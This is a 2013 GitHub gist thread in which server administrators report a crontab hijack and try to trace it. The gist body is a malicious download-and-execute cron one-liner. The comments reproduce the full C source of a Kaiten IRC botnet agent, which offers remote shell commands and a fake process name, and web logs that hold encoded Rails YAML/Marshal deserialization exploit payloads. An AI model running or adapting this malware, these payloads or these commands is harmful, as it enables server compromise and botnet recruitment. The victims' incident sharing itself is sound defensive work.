/gist:5647955
Created May 25, 2013
| crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
conqueringlion93
commented
May 25, 2013
|
Hi, I have the same msg from my server since 3 days, any ideas to block this attempt ? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
commented
May 25, 2013
|
Hi, I have the same problem.. (1 day ago) |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
May 25, 2013
I found just that (with syslog) :
May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login)
May 24 17:24:15 localhost crontab[27818]: (my_login) LIST (my_login)
May 24 17:24:15 localhost crontab[27817]: (my_login) REPLACE (my_login)
May 24 17:24:16 localhost crontab[27821]: (my_login) DELETE (my_login)
May 24 17:24:16 localhost crontab[27827]: (my_login) LIST (my_login)
May 24 17:24:16 localhost crontab[27826]: (my_login) REPLACE (my_login)
At the moment, I didn't understand how he could do that...
By ssh is impossible because i use private key with password (PasswordAuthentication no)
I think the man has access because he uploaded this files whitout me noticing. (for me : "k.c" & "sh.py")
Also he run process "than.pid" with fake a name "- bash".
Be careful.
Netmisa
commented
May 25, 2013
|
I found just that (with syslog) : May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login) At the moment, I didn't understand how he could do that... I think the man has access because he uploaded this files whitout me noticing. (for me : "k.c" & "sh.py") Be careful. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
dashbitla
May 26, 2013
I have the same problem!
This is really CRAZY! How is this even possible that someone can get into the Servers?
Even I have the same issue too.
The server crontab is being overridden with this:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;
This happened twice in the last 3 days. Not sure how anyone can get into the server and do this.
On which data center you are seeing this issue? Ours is on Linode.
Hope its not related to the Security concerns that happened a few weeks ago.
What did you do to fix that?
dashbitla
commented
May 26, 2013
|
I have the same problem! This is really CRAZY! How is this even possible that someone can get into the Servers? The server crontab is being overridden with this: This happened twice in the last 3 days. Not sure how anyone can get into the server and do this. On which data center you are seeing this issue? Ours is on Linode. What did you do to fix that? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
May 26, 2013
Hi,
I have a personal server at home, I'm not using any data center.
I really don't know how this man got into the server. And i can't believe it is by ssh.. I'm going to look at every logs on my server. I suspect the guy used http protocol.. But I'm really not sure.
At the moment, I haven't fixed that, and i think to reinstall my system to be sure to reset all access and maybe remove suspicious programs.
Can you tell me briefly what you mean by "security concerns" ? I wonder if he managed to access by one of my wordpress websites. Do you have any website (wordpress type) ?
Check your temporaries folders (/var/tmp & /tmp & ...). Because I saw suspicious program files with fake creation dates...
Thanks
Netmisa
commented
May 26, 2013
|
Hi, I have a personal server at home, I'm not using any data center. I really don't know how this man got into the server. And i can't believe it is by ssh.. I'm going to look at every logs on my server. I suspect the guy used http protocol.. But I'm really not sure. At the moment, I haven't fixed that, and i think to reinstall my system to be sure to reset all access and maybe remove suspicious programs. Can you tell me briefly what you mean by "security concerns" ? I wonder if he managed to access by one of my wordpress websites. Do you have any website (wordpress type) ? Check your temporaries folders (/var/tmp & /tmp & ...). Because I saw suspicious program files with fake creation dates... Thanks |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
commented
May 26, 2013
|
Do you have a redmine ? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
bu2
May 26, 2013
Hi,
We have the same problem on customer servers dedicated to a custom Ruby on Rails application.
I have noticed different crontab during the past four days (since 23th of May).
On 2013-05-23:
- 1 * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
On 2013-05-24:
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
Today:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;
I suspect (but I have no clue ^^) the root vulnerability which give access to the server might be related to Ruby on Rails. We are using:
- Ruby 1.9.3 p327
- Ruby On Rails 3.2.11
And we didn't manage to update our servers because we are still in heavy development mode.
We tried to change root password as quick fix but it didn't stop the attacker (I am even not sure that he needs/uses root access as he overrides user-level crontab...).
Regards.
bu2
commented
May 26, 2013
|
Hi, We have the same problem on customer servers dedicated to a custom Ruby on Rails application. On 2013-05-23:
On 2013-05-24: Today: I suspect (but I have no clue ^^) the root vulnerability which give access to the server might be related to Ruby on Rails. We are using:
And we didn't manage to update our servers because we are still in heavy development mode. We tried to change root password as quick fix but it didn't stop the attacker (I am even not sure that he needs/uses root access as he overrides user-level crontab...). Regards. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
bu2
May 26, 2013
Here is the code of kaiten-src.c, kind of botnet agent which was uploaded and run repetitively since the first crontab intrusion:
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
undef STARTUP // Start on startup?
undef IDENT // Only enable this if you absolutely have to
define FAKENAME "- bash" // What you want this to hide as
define CHAN "#rails" // Channel to join
define TEMPDIR "/var/tmp" // Where to save generated ips text file
define KEY "" // The key of the channel
define VERSION "0.1" // dfnctsc-kaiten release version
define PORT 6667 // Port of server(s)
int numservers = 1; // Must change this to equal number of servers down there
char servers[] = {// List the servers in that format, always end in (void)0
"cvv4you.ru",
"188.190.124.120",
(void*) 0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////
include <stdarg.h>
include <errno.h>
include <stdio.h>
include <stdlib.h>
include <string.h>
include <sys/types.h>
include <sys/stat.h>
include <fcntl.h>
include <strings.h>
include <netinet/in.h>
include <unistd.h>
include <sys/time.h>
include <sys/socket.h>
include <signal.h>
include <arpa/inet.h>
include <netdb.h>
include <time.h>
include <ctype.h>
include <sys/wait.h>
include <sys/ioctl.h>
int sock, changeservers = 0;
char *server, *chan, *key, *nick, *ident, *user, execfile[256], dispass[256];
unsigned int *pids;
unsigned long spoofs = 0, spoofsm = 0, numpids = 0, running = 0;
int strwildmatch(const char* pattern, const char* string) {
switch (pattern) {
case '\0': return *string;
case '': return !(!strwildmatch(pattern + 1, string) || _string && !strwildmatch(pattern, string + 1));
case '?': return !(_string && !strwildmatch(pattern + 1, string + 1));
default: return !((toupper(_pattern) == toupper(_string)) && !strwildmatch(pattern + 1, string + 1));
}
}
int send_msg(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args);
va_end(args);
return write(sock, textBuffer, strlen(textBuffer));
}
int mfork(char sender) {
unsigned int parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent;
numpids++;
newpids = (unsigned int) malloc((numpids + 1) * sizeof (unsigned int));
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
free(pids);
pids = newpids;
return parent;
}
void filter(char *a) {
while (a[strlen(a) - 1] == '\r' || a[strlen(a) - 1] == '\n') a[strlen(a) - 1] = 0;
}
char makestring() {
char *tmp;
int len = 9, i;
tmp = (char) malloc(len + 1);
memset(tmp, 0, len + 1);
for (i = 0; i < len; i++) tmp[i] = (rand() % (91 - 65)) + 65;
return tmp;
}
long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a * pow(a, b - 1);
}
u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
void get(int sock, char _sender, int argc, char *_argv) {
int sock2, i, d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
send_msg(sock, "PRIVMSG %s :GET \n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
send_msg(sock, "PRIVMSG %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1], "http://", 7)) strcpy(buf, argv[1] + 7);
else strcpy(buf, argv[1]);
for (i = 0; i < strlen(buf) && buf[i] != '/'; i++);
buf[i] = 0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm = gethostbyname(buf)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char) &server.sin_addr, hostm->h_addr, hostm->h_length);
} else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2, (struct sockaddr *) &server, sizeof (server)) != 0) {
send_msg(sock, "PRIVMSG %s :Unable to connect to http.\n", sender);
exit(0);
}
send_msg(sock2, "GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n", buf + i + 1, buf);
send_msg(sock, "PRIVMSG %s :Receiving file.\n", chan);
file = fopen(argv[2], "wb");
while (1) {
int i;
if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
if (i < 4096) bufm[i] = 0;
for (d = 0; d < i; d++) if (!strncmp(bufm + d, "\r\n\r\n", 4)) {
for (d += 4; d < i; d++) fputc(bufm[d], file);
goto done;
}
}
done:
send_msg(sock, "PRIVMSG %s :Saved as %s\n", chan, argv[2]);
while (1) {
int i, d;
if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
if (i < 4096) bufm[i] = 0;
for (d = 0; d < i; d++) fputc(bufm[d], file);
}
fclose(file);
close(sock2);
exit(0);
}
void nickc(int sock, char _sender, int argc, char *_argv) {
if (argc != 1) {
send_msg(sock, "PRIVMSG %s :NICK \n", sender);
return;
}
if (strlen(argv[1]) >= 10) {
send_msg(sock, "PRIVMSG %s :Nick cannot be larger than 9 characters.\n", sender);
return;
}
send_msg(sock, "NICK %s\n", argv[1]);
}
struct iphdr {
unsigned int ihl : 4, version : 4;
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};
struct udphdr {
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};
struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned short res1 : 4, doff : 4;
unsigned char fin : 1, syn : 1, rst : 1, psh : 1, ack : 1, urg : 1, ece : 1, cwr : 1;
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};
struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};
struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};
unsigned int host2ip(char *sender, char *hostname) {
static struct in_addr i;
struct hostent *h;
if ((i.s_addr = inet_addr(hostname)) == -1) {
if ((h = gethostbyname(hostname)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve %s\n", sender, hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}
void move(int sock, char _sender, int argc, char *_argv) {
if (argc < 1) {
send_msg(sock, "PRIVMSG %s :MOVE \n", sender);
exit(1);
}
server = strdup(argv[1]);
changeservers = 1;
close(sock);
}
void killd(int sock, char _sender, int argc, char *_argv) {
kill(0, 9);
}
void help(int sock, char _sender, int argc, char *_argv) {
if (mfork(sender) != 0) return;
send_msg(sock, "NOTICE %s :NICK = Changes the nick of the client\n", sender);
send_msg(sock, "NOTICE %s :SERVER = Changes servers\n", sender);
send_msg(sock, "NOTICE %s :KILL = Kills the client\n", sender);
send_msg(sock, "NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n", sender);
send_msg(sock, "NOTICE %s :HELP = Displays this\n", sender);
send_msg(sock, "NOTICE %s :IRC = send_msgs this command to the server\n", sender);
send_msg(sock, "NOTICE %s :SH = Executes a command\n", sender);
exit(0);
}
struct FMessages {
char cmd;
void ( func)(int, char , int, char *);
} flooders[] = {
{ "NICK", nickc},
{ "SERVER", move},
{ "GET", get},
{ "KILL", killd},
{ "HELP", help},
{ (char *) 0, (void (*)(int, char *, int, char **))0}
};
void _PRIVMSG(int sock, char _sender, char *str) {
int i;
char *to, *message;
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
to = str;
message = str + i + 2;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (_message == '!' && !strcasecmp(to, chan)) {
char _params[12], name[1024] = {0};
int num_params = 0, m;
message++;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
message[i] = 0;
if (strwildmatch(message, nick)) return;
message += i + 1;
if (!strncmp(message, "IRC ", 4)) send_msg(sock, "%s\n", message + 4);
if (!strncmp(message, "SH ", 3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf, 0, 1024);
sprintf(buf, "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s", message + 3);
command = popen(buf, "r");
while (!feof(command)) {
memset(buf, 0, 1024);
fgets(buf, 1024, command);
send_msg(sock, "PRIVMSG %s :%s\n", chan, buf);
sleep(1);
}
pclose(command);
exit(0);
}
m = strlen(message);
for (i = 0; i < m; i++) {
if (_message == ' ' || _message == 0) break;
name[i] = message;
message++;
}
for (i = 0; i < strlen(message); i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params = 10;
params[0] = name;
params[num_params + 1] = "\0";
m = 1;
while (_message != 0) {
message++;
if (m >= num_params) break;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
params[m] = (char) malloc(i + 1);
strncpy(params[m], message, i);
params[m][i] = 0;
m++;
message += i;
}
for (m = 0; flooders[m].cmd != (char *) 0; m++) {
if (!strcasecmp(flooders[m].cmd, name)) {
flooders[m].func(sock, sender, num_params - 1, params);
for (i = 1; i < num_params; i++) free(params[i]);
return;
}
}
}
}
void _376(int sock, char *sender, char *str) {
send_msg(sock, "MODE %s -ix\n", nick);
send_msg(sock, "JOIN %s :%s\n", chan, key);
send_msg(sock, "WHO %s\n", nick);
}
void _PING(int sock, char *sender, char *str) {
send_msg(sock, "PONG %s\n", str);
}
void 352(int sock, char sender, char *str) {
int i, d;
char *msg = str;
struct hostent *hostm;
unsigned long m;
for (i = 0, d = 0; d < 5; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if (!strcasecmp(msg, nick) && !spoofsm) {
msg = str;
for (i = 0, d = 0; d < 3; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm = gethostbyname(msg)) == NULL) {
send_msg(sock, "PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n", sender);
return;
}
memcpy((char) &m, hostm->h_addr, hostm->h_length);
}
((char) &spoofs)[3] = ((char_) &m)[0];
((char_) &spoofs)[2] = ((char_) &m)[1];
((char_) &spoofs)[1] = ((char_) &m)[2];
((char*) &spoofs)[0] = 0;
spoofsm = 256;
}
}
void _433(int sock, char *sender, char *str) {
free(nick);
nick = makestring();
}
void _NICK(int sock, char _sender, char *str) {
int i;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (!strcasecmp(sender, nick)) {
if (_str == ':') str++;
if (nick) free(nick);
nick = strdup(str);
}
}
struct Messages {
char cmd;
void ( func)(int, char _, char *);
} msgs[] = {
{ "352", _352},
{ "376", _376},
{ "433", _433},
{ "422", _376},
{ "PRIVMSG", _PRIVMSG},
{ "PING", _PING},
{ "NICK", NICK},
{ (char *) 0, (void ()(int, char *, char *))0}
};
void con() {
struct sockaddr_in srv;
unsigned long ipaddr, start;
int flag;
struct hostent hp;
start:
sock = -1;
flag = 1;
if (changeservers == 0) server = servers[rand() % numservers];
changeservers = 0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server = NULL;
close(sock);
goto start;
}
bcopy((char) hp->h_addr, (char*) &srv.sin_addr, hp->h_length);
} else srv.sin_addr.s_addr = inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(PORT);
ioctl(sock, FIONBIO, &flag);
start = time(NULL);
while (time(NULL) - start < 10) {
errno = 0;
if (connect(sock, (struct sockaddr *) &srv, sizeof (srv)) == 0 || errno == EISCONN) {
setsockopt(sock, SOL_SOCKET, SO_LINGER, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, 0, 0);
return;
}
if (!(errno == EINPROGRESS || errno == EALREADY)) break;
sleep(1);
}
server = NULL;
close(sock);
goto start;
}
int lockfile() {
int pid_file = open("/tmp/tan.pid", O_CREAT | O_RDWR, 0666);
int rc = flock(pid_file, LOCK_EX | LOCK_NB);
if (rc && EWOULDBLOCK == errno) {
printf("Lockfile found. Exiting.");
exit(0);
}
}
int main(int argc, char **argv) {
lockfile();
int on, i;
char cwd[256], *str;
FILE *file;
ifdef STARTUP
str = "/etc/rc.d/rc.local";
file = fopen(str, "r");
if (file == NULL) {
str = "/etc/rc.conf";
file = fopen(str, "r");
}
if (file != NULL) {
char outfile[256], buf[1024];
int i = strlen(argv[0]), d = 0;
getcwd(cwd, 256);
if (strcmp(cwd, "/")) {
while (argv[0][i] != '/') i--;
sprintf(outfile, "\"%s%s\"\n", cwd, argv[0] + i);
while (!feof(file)) {
fgets(buf, 1024, file);
if (!strcasecmp(buf, outfile)) d++;
}
if (d == 0) {
FILE *out;
fclose(file);
out = fopen(str, "a");
if (out != NULL) {
fputs(outfile, out);
fclose(out);
}
} else fclose(file);
} else fclose(file);
}
endif
if (fork()) exit(0);
ifdef FAKENAME
strncpy(argv[0], FAKENAME, strlen(argv[0]));
for (on = 1; on < argc; on++) memset(argv[on], 0, strlen(argv[on]));
endif
srand((time(NULL) ^ getpid()) + getppid());
nick = makestring();
ident = makestring();
user = "raft";
chan = CHAN;
key = KEY;
server = NULL;
sa:
ifdef IDENT
for (i = 0; i < numpids; i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
kill(pids[i], 9);
waitpid(pids[i], NULL, WNOHANG);
}
}
pids = NULL;
numpids = 0;
identd();
endif
con();
send_msg(sock, "NICK %s\nUSER %s localhost localhost :%s\n", nick, ident, user);
while (1) {
unsigned long i;
fd_set n;
struct timeval tv;
FD_ZERO(&n);
FD_SET(sock, &n);
tv.tv_sec = 60 * 20;
tv.tv_usec = 0;
if (select(sock + 1, &n, (fd_set*) 0, (fd_set*) 0, &tv) <= 0) goto sa;
for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
unsigned int *newpids, on;
for (on = i + 1; on < numpids; on++) pids[on - 1] = pids[on];
pids[on - 1] = 0;
numpids--;
newpids = (unsigned int*) malloc((numpids + 1) * sizeof (unsigned int));
for (on = 0; on < numpids; on++) newpids[on] = pids[on];
free(pids);
pids = newpids;
}
if (FD_ISSET(sock, &n)) {
char buf[4096], *str;
int i;
if ((i = recv(sock, buf, 4096, 0)) <= 0) goto sa;
buf[i] = 0;
str = strtok(buf, "\n");
while (str && *str) {
char name[1024], sender[1024];
filter(str);
if (*str == ':') {
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
strcpy(sender, str + 1);
strcpy(str, str + i + 1);
} else strcpy(sender, "*");
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
strcpy(name, str);
strcpy(str, str + i + 1);
for (i = 0; msgs[i].cmd != (char *) 0; i++) if (!strcasecmp(msgs[i].cmd, name)) msgs[i].func(sock, sender, str);
if (!strcasecmp(name, "ERROR")) goto sa;
str = strtok((char*) NULL, "\n");
}
}
}
return 0;
}
bu2
commented
May 26, 2013
|
Here is the code of kaiten-src.c, kind of botnet agent which was uploaded and run repetitively since the first crontab intrusion: //////////////////////////////////////////////////////////////////////////////// undef STARTUP // Start on startup?undef IDENT // Only enable this if you absolutely have todefine FAKENAME "- bash" // What you want this to hide asdefine CHAN "#rails" // Channel to joindefine TEMPDIR "/var/tmp" // Where to save generated ips text filedefine KEY "" // The key of the channeldefine VERSION "0.1" // dfnctsc-kaiten release versiondefine PORT 6667 // Port of server(s)int numservers = 1; // Must change this to equal number of servers down there include <stdarg.h>include <errno.h>include <stdio.h>include <stdlib.h>include <string.h>include <sys/types.h>include <sys/stat.h>include <fcntl.h>include <strings.h>include <netinet/in.h>include <unistd.h>include <sys/time.h>include <sys/socket.h>include <signal.h>include <arpa/inet.h>include <netdb.h>include <time.h>include <ctype.h>include <sys/wait.h>include <sys/ioctl.h>int sock, changeservers = 0; int strwildmatch(const char* pattern, const char* string) { int send_msg(int sock, char *words, ...) { int mfork(char sender) { void filter(char *a) { char makestring() { long pow(long a, long b) { u_short in_cksum(u_short *addr, int len) { void get(int sock, char _sender, int argc, char *_argv) { done: void nickc(int sock, char _sender, int argc, char *_argv) { struct iphdr { struct udphdr { struct tcphdr { struct send_tcp { struct pseudo_header { unsigned int host2ip(char *sender, char *hostname) { void move(int sock, char _sender, int argc, char *_argv) { void killd(int sock, char _sender, int argc, char *_argv) { void help(int sock, char _sender, int argc, char *_argv) { struct FMessages { }; void _PRIVMSG(int sock, char _sender, char *str) { void _376(int sock, char *sender, char *str) { void _PING(int sock, char *sender, char *str) { void 352(int sock, char sender, char *str) { void _433(int sock, char *sender, char *str) { void _NICK(int sock, char _sender, char *str) { struct Messages { void con() { int lockfile() { int main(int argc, char **argv) { ifdef STARTUPendififdef FAKENAMEendifsa: ifdef IDENTendif} |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Netmisa
May 26, 2013
Hi,
Ok that's why I asked if one of you have redmine. Because I found interesting logs.
I think he uses "/login?back_url="
nginx/access.log (My redmine)
17510: 88.198.20.247 - - [24/May/2013:15:17:34 +0200] "HEAD / HTTP/1.1" 302 0 "-" "-" "-"
.....
17584: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "POST / HTTP/1.1" 302 1256 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17585: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4006 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17586: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 778 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17587: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3669 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17588: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 904 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17589: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3760 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17590 89.100.221.85 - - [24/May/2013:18:13:47 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
17591 89.100.221.85 - - [24/May/2013:18:14:00 +0200] "-" 400 0 "-" "-" "-"
.....
17628 89.100.221.85 - - [24/May/2013:20:39:12 +0200] "-" 400 0 "-" "-" "-"
17629: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "POST / HTTP/1.1" 302 1200 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
